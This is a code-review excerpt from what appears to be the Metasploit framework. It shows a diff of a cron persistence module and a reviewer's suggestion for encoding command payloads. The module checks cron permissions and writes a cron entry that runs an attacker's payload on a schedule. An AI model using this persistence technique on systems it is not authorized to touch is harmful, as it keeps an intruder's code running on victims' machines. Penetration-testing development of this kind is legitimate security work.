modules/exploits/multi/persistence/cron.rb

```diff
@@ -0,0 +1,187 @@
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USER', [false, 'User to run cron/crontab as', ''], conditions: ['Targets', 'in', ['User Crontab', 'OSX User Crontab']]),
+        OptString.new('TIMING', [false, 'Cron timing. Changing will require WfsDelay to be adjusted', '* * * * *']),
+        OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),
+      ]
+    )
+  end
+
+  def check
+    # https://gist.github.com/istvanp/310203 for cron regex validator
+    cron_regex = '(\*|[0-5]?[0-9]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|1?[0-9]|2[0-3]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|[1-2]?[0-9]|3[0-1]|\*\/[0-9]+)\s+'
+    cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
+    cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
+    # cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
+
+    return CheckCode::Unknown('Invalid timing format') unless datastore['TIMING'] =~ /#{cron_regex}/
+
+    return CheckCode::Safe("#{target.opts[:path]} doesn't exist") unless exists?(target.opts[:path])
+    # it may not be directly writable, but we can use crontab to write it for us
+    if !writable?(target.opts[:path]) && !command_exists?('crontab')
+      return CheckCode::Safe("Can't write to: #{target.opts[:path]} or crontab not found")
+    end
+
+    if target.name == 'User Crontab' && !user_cron_permission?(target_user)
+      return CheckCode::Unknown('User denied cron via cron.deny')
+    end
+
+    CheckCode::Appears('Cron timing is valid, no cron.deny entries found')
+  end
+
+  def target_user
+    return datastore['USER'] unless datastore['USER'].blank?
+
+    whoami
+  end
+
+  def user_cron_permission?(user)
+    # double check we're allowed to do cron
+    # may also be /etc/cron.d/
+    paths = ['/etc/', '/etc/cron.d/']
+    paths.each do |path|
+      if readable?("#{path}cron.allow")
+        cron_auth = read_file("#{path}cron.allow")
+        if cron_auth && (cron_auth =~ /^ALL$/ || cron_auth =~ /^#{Regexp.escape(user)}$/)
+          vprint_good("User located in #{path}cron.allow")
+          return true
+        end
+      end
+      next unless readable?("#{path}cron.deny")
+
+      cron_auths = read_file("#{path}cron.deny")
+      if cron_auths && cron_auth =~ /^#{Regexp.escape(user)}$/
+        vprint_error("User located in #{path}cron.deny")
+        return false
+      end
+    end
+    # no guidance, so we should be fine
+    true
+  end
+
+  def install_persistence
+    cron_entry = datastore['TIMING']
+    cron_entry += " #{target_user}" unless ['User Crontab', 'OSX User Crontab'].include?(target.name)
+    if payload.arch.first == 'cmd'
+      cron_entry += " #{payload.encoded}"
+    else
```

Comment:
@h00die, waiting on some other folk suggestion and feedback here. trying to not make it too much hacky

```suggestion
     if payload.arch.first == 'cmd'

      # This code add run-time BadChars for cmd payloads.
      # This cannot be done on the target as they are used for Crontab Path selection.
      payload_reqs = payload.instance_variable_get(:@reqs) 
      payload_reqs['BadChars'] = "#%\x10\x13"
      payload.instance_variable_set(:@reqs, payload_reqs)

      # Force payload re-generation, with the encoder.
      payload.generate(new_reqs['Raw'])

      cron_entry += " #{payload.encoded}"
    else
```